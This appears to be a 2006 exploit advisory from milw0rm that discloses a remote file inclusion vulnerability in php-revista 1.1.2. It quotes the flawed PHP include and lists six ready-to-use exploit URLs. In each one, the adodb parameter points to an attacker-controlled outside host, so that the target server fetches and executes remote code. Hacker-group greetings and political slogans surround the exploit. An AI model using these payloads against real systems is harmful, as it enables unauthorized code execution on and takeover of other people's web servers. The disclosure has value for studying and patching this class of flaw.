--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
php-revista <= 1.1.2 (index.php) Remote File Include Vulnerability
Found By : CoLd Zero [ Wasem898 ]
Source : include_once ($4AZHAR_TeAM."Securty.");
require ($SpECiALPowEr.oRg_TeAm."Securty");
A_mal Hackeing Team _ Hacking
PalesTine Arab Muslim Hacker
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
######################################################
#
# php-revista 1.1.2
#
# Class: Remote File Include Vulnerability
# Published 2006-12-3
# Remote: Yes
# Type: high
# Site:
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0
#
# Author: Cold Zero
# Contact: c.o.1.d.0@hotmail.com
#
######################################################
<?
include ("$adodb");
$obten_rev="select max(id_revista) as id from revista where terminada=1";
$obten = $DB->execute("$obten_rev");
$id_revista = $obten->fields["id"];
======================================================
Exploit :
Http://www.Victem.0/[php-revista_PaTH]/estilo/Digital_Multiplex/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/discreet/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/galveston/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/mergedidea/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/Shadow_Boxer/index.php?adodb=http://4azhar.com/soft.txt?
Http://www.Victem.0/[php-revista_PaTH]/estilo/Widget_Factory/index.php?adodb=http://4azhar.com/soft.txt?
======================================================
---- GreeTz: [MoHaNdKo] [Cold One] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
[Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[ Everyone I know
****************************************************************
# *www.4azhar.com Securty Team >> www.4azhar.com *
# *SpeciaL PoweR SecuritY Team >> www.specialpower.org *
# *A_mal Hacking Team >> -vv -l -p The-Pradise *
*****************************************************************
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif
--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------
# milw0rm.com [2006-12-03]